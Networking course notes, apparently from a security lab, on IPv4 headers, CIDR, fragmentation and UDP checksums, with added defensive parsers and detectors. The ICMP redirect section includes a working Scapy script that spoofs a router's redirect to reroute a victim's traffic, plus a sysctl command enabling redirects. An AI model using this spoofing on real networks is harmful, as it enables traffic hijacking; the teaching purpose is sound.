
InternetProtocol Notes

IP is the Internet Protocol that defines the format and structure of packets sent over the internet. The IP header contains fields like version, total length, identification, flags, fragment offset, time to live, and protocol. IP addresses are represented using CIDR notation. IP packets can be fragmented into smaller pieces. ICMP redirect attacks try to reroute traffic by spoofing fake ICMP messages from routers. UDP is a transport layer protocol that runs on top of IP and provides checksums for data integrity but they are not always verified.

Uploaded by

simon sylvester
Copyright
© All Rights Reserved

IP: Internet Protocol

• IP Header
  o Version: 4
  o Internet Header Length (IHL): length of the IP header, counted in 4-byte units. The minimum is 5 (the minimal IP header size is 20 bytes).
  o Total length: the length of the entire packet, including header and data. Since the field has 16 bits, the maximum size of an IP packet is 2^16 − 1 = 65535 bytes.
  o Identification: identifies the group of fragments of a single IP datagram.
  o Flags:
    ▪ Bit 0: Reserved, must be zero
    ▪ Bit 1: Don’t fragment (DF), can be used for path MTU discovery
    ▪ Bit 2: More fragments (MF)
  o Fragment offset: the offset of this packet’s data, counted in 8-byte units.
  o Time to live: helps prevent IP datagrams from persisting on an internet by limiting a packet’s lifetime.
  o Protocol: specifies the protocol of the payload.
• IP Address
  o CIDR Notation
    ▪ 192.168.100.14/24 represents the IPv4 address 192.168.100.14 and its associated routing prefix 192.168.100.0, or equivalently, its subnet mask 255.255.255.0, which has 24 leading 1-bits.
    ▪ The IPv4 block 192.168.100.0/22 represents the 1024 IPv4 addresses from 192.168.100.0 to 192.168.103.255.
    ▪ 192.168.100.0/24 is equivalent to 192.168.100.0/255.255.255.0.
• IP fragmentation
  o The fragmented packets will have the same ID.
  o All packets except the last one will have the MF flag set.
  o Sample fragmented IP traffic
    ▪ Total size of IP payload: UDPHDR(8) + PAYLOAD(10000) = 10008
    ▪ The length of each packet: ETHERHDR(14) + IP
    ▪ Therefore, each packet of length 1514 contains 1500 bytes of IP data, which means 1480 bytes of payload. The packet of length 1162 contains 1162 − 14 − 20 = 1128 bytes of payload. The total size of payload is 1480 × 6 + 1128 = 10008.
No.  Source         Destination  Protocol  Length  Info
5    192.168.0.100  192.168.0.1  IPv4      1514    “Fragmented IP protocol (proto=UDP 17, off=0, ID=0001) [Reassembled in #11]”
6    192.168.0.100  192.168.0.1  IPv4      1514    “Fragmented IP protocol (proto=UDP 17, off=1480, ID=0001) [Reassembled in #11]”
7    192.168.0.100  192.168.0.1  IPv4      1514    “Fragmented IP protocol (proto=UDP 17, off=2960, ID=0001) [Reassembled in #11]”
8    192.168.0.100  192.168.0.1  IPv4      1514    “Fragmented IP protocol (proto=UDP 17, off=4440, ID=0001) [Reassembled in #11]”
9    192.168.0.100  192.168.0.1  IPv4      1514    “Fragmented IP protocol (proto=UDP 17, off=5920, ID=0001) [Reassembled in #11]”
10   192.168.0.100  192.168.0.1  IPv4      1514    “Fragmented IP protocol (proto=UDP 17, off=7400, ID=0001) [Reassembled in #11]”
11   192.168.0.100  192.168.0.1  UDP       1162    50000 -> 50000 Len=10000
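
The capture above can be reproduced from the header fields alone. The following is an added example, not part of the original notes: it builds the raw IPv4 headers for a 10008-byte payload, decodes them again, and checks that the fragments form one complete datagram. The function names, the TTL of 64 and the zeroed header checksum are assumptions made for the illustration.

```python
import struct

ETH_HDR, IP_HDR = 14, 20   # header sizes used in the notes (IHL = 5)
FMT = "!BBHHHBBH4s4s"      # fixed 20-byte IPv4 header layout

def build_fragment_headers(payload_len, mtu=1500, ident=1, proto=17):
    """Constructed sample input: raw IPv4 headers for each fragment of one datagram."""
    step = (mtu - IP_HDR) // 8 * 8            # data per fragment, a multiple of 8
    src, dst = bytes([192, 168, 0, 100]), bytes([192, 168, 0, 1])
    headers, off = [], 0
    while off < payload_len:
        size = min(step, payload_len - off)
        mf = 1 if off + size < payload_len else 0
        flags_off = (mf << 13) | (off // 8)   # MF is bit 2 of the 3 flag bits
        headers.append(struct.pack(FMT, 0x45, 0, IP_HDR + size, ident,
                                   flags_off, 64, proto, 0, src, dst))  # checksum left 0
        off += size
    return headers

def parse_header(raw):
    """Decode the header fields listed in the notes from 20 raw bytes."""
    vi, _, total, ident, fo, ttl, proto, _, _, _ = struct.unpack(FMT, raw[:20])
    ihl = (vi & 0x0F) * 4                     # IHL counts 4-byte units
    return {"version": vi >> 4, "ihl": ihl, "id": ident, "ttl": ttl, "proto": proto,
            "df": bool(fo & 0x4000), "mf": bool(fo & 0x2000),
            "offset": (fo & 0x1FFF) * 8,      # offset counts 8-byte units
            "data": total - ihl, "frame": total + ETH_HDR}

def reassembled_length(frags):
    """Return the payload length if the fragments form one complete datagram, else None."""
    frags = sorted(frags, key=lambda f: f["offset"])
    if not frags or len({f["id"] for f in frags}) != 1:
        return None
    expected = 0
    for i, f in enumerate(frags):
        is_last = i == len(frags) - 1
        if f["offset"] != expected or f["mf"] == is_last:
            return None                       # gap, overlap, or wrong MF flag
        expected += f["data"]
    return expected

if __name__ == "__main__":
    frags = [parse_header(h) for h in build_fragment_headers(8 + 10000)]
    for f in frags:
        print(f["frame"], f["offset"], f["id"], "MF" if f["mf"] else "last")
    print("reassembled:", reassembled_length(frags))
```

The seventh header (offset 8880, MF clear) corresponds to frame 11, which Wireshark shows as the reassembled UDP datagram.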
• DoS attack with IP fragmentation: send a lot of packets with the MF flag set and different IDs to try to exhaust the victim’s memory. Unfortunately, this problem has been fixed and the attack no longer works.
• ICMP redirect attack
  o An ICMP redirect is an error message sent by a router to the sender of an IP packet. Redirects are used when a router believes a packet is being routed suboptimally and it would like to inform the sending host that it should forward subsequent packets to that same destination through a different gateway.
  o By default, Linux does not process redirect packets. To enable processing, one needs to run:

      [02/09/20]seed@vm2:~$ sudo sysctl net.ipv4.conf.all.accept_redirects=1
      net.ipv4.conf.all.accept_redirects = 1

  o The construction of an ICMP redirect attack packet
    ▪ We spoof a fake ICMP message on behalf of the network’s router to the victim, informing it that packets sent to 10.0.0.1 should be routed to 10.0.2.5.

      from scapy.all import *
      # Outer header: source is the router's address, destination is the victim
      ip1 = IP(src='10.0.2.1', dst='10.0.2.6')
      # ICMP type 5 = redirect, code 1 = redirect for host; gw is the new gateway
      icmp = ICMP(type=5, code=1, gw='10.0.2.5')
      # Embedded header of the packet being redirected: victim -> 10.0.0.1
      ip2 = IP(src='10.0.2.6', dst='10.0.0.1')
      udp = UDP(dport=9090)
      packet = ip1/icmp/ip2/udp
      send(packet)

    ▪ If the destination IP is a local machine, this may not work because those packets will not be routed.
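
On the monitoring side, the same packet layout can be decoded to flag redirects that point at an unexpected gateway. This is an added example, not part of the original notes: the function names, the known-gateway set and the sample bytes (checksums left at zero, UDP source port chosen arbitrarily) are assumptions constructed for the illustration.

```python
import socket
import struct

def ip_header(src, dst, proto, total_len):
    """Minimal 20-byte IPv4 header for constructed samples (checksum left 0)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))

# Constructed sample: the redirect described above, as raw bytes for parsing only.
SAMPLE_REDIRECT = (
    ip_header("10.0.2.1", "10.0.2.6", 1, 56)                        # outer: router -> host
    + struct.pack("!BBH4s", 5, 1, 0, socket.inet_aton("10.0.2.5"))  # ICMP type 5, code 1, gw
    + ip_header("10.0.2.6", "10.0.0.1", 17, 28)                     # embedded original header
    + struct.pack("!HHHH", 40000, 9090, 8, 0)                       # embedded UDP header
)

def parse_redirect(pkt):
    """Return the redirect's fields, or None if pkt is not an ICMP redirect."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4 or pkt[9] != 1:   # IPv4, protocol 1 = ICMP
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if len(pkt) < ihl + 8 + 20 or pkt[ihl] != 5:           # ICMP type 5 = redirect
        return None
    inner = pkt[ihl + 8:]                                  # header of the redirected packet
    return {"claimed_sender": socket.inet_ntoa(pkt[12:16]),
            "code": pkt[ihl + 1],
            "new_gateway": socket.inet_ntoa(pkt[ihl + 4:ihl + 8]),
            "host": socket.inet_ntoa(inner[12:16]),
            "destination": socket.inet_ntoa(inner[16:20])}

def assess(pkt, known_gateways):
    """Classify a packet; the source address is spoofable, so the new gateway is checked."""
    r = parse_redirect(pkt)
    if r is None:
        return "not-a-redirect"
    if r["new_gateway"] not in known_gateways:
        return "alert: %s -> %s via unknown gateway %s" % (
            r["host"], r["destination"], r["new_gateway"])
    return "redirect to known gateway"

if __name__ == "__main__":
    print(assess(SAMPLE_REDIRECT, known_gateways={"10.0.2.1"}))
```

Hosts that have no need for redirects can keep net.ipv4.conf.all.accept_redirects at 0, the setting the notes change for the experiment.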
UDP: User Datagram Protocol

• UDP checksum is not always verified
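
What verification involves, as an added example that is not part of the original notes: the UDP checksum is a 16-bit one's-complement sum over an IPv4 pseudo-header plus the UDP segment, and over IPv4 a checksum field of zero means the sender computed none. Function names, addresses and payloads below are constructed for the illustration.

```python
import socket
import struct

def ones_sum(data):
    """16-bit one's-complement sum with end-around carry."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total

def pseudo_header(src, dst, udp_len):
    """IPv4 pseudo-header: source, destination, zero, protocol 17, UDP length."""
    return socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 17, udp_len)

def build_udp(src, dst, sport, dport, payload):
    """Constructed sample input: a UDP segment carrying a correct checksum."""
    length = 8 + len(payload)
    seg = struct.pack("!HHHH", sport, dport, length, 0) + payload
    csum = ~ones_sum(pseudo_header(src, dst, length) + seg) & 0xFFFF
    csum = csum or 0xFFFF                     # a computed 0 is transmitted as 0xFFFF
    return seg[:6] + struct.pack("!H", csum) + payload

def verify_udp(src, dst, seg):
    """Return 'valid', 'invalid', or 'absent' (checksum field 0: sender computed none)."""
    if len(seg) < 8:
        return "invalid"
    length, csum = struct.unpack("!HH", seg[4:8])
    if length != len(seg):
        return "invalid"
    if csum == 0:
        return "absent"
    ok = ones_sum(pseudo_header(src, dst, length) + seg) == 0xFFFF
    return "valid" if ok else "invalid"

if __name__ == "__main__":
    src, dst = "192.168.0.100", "192.168.0.1"
    seg = build_udp(src, dst, 50000, 50000, b"hello")
    print(verify_udp(src, dst, seg))                          # intact segment
    print(verify_udp(src, dst, seg[:8] + b"jello"))           # payload altered in transit
    print(verify_udp(src, dst, seg[:6] + b"\x00\x00" + seg[8:]))  # checksum not computed
```

A receiver that skips this check, or accepts the "absent" case, will deliver an altered payload to the application unchanged.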
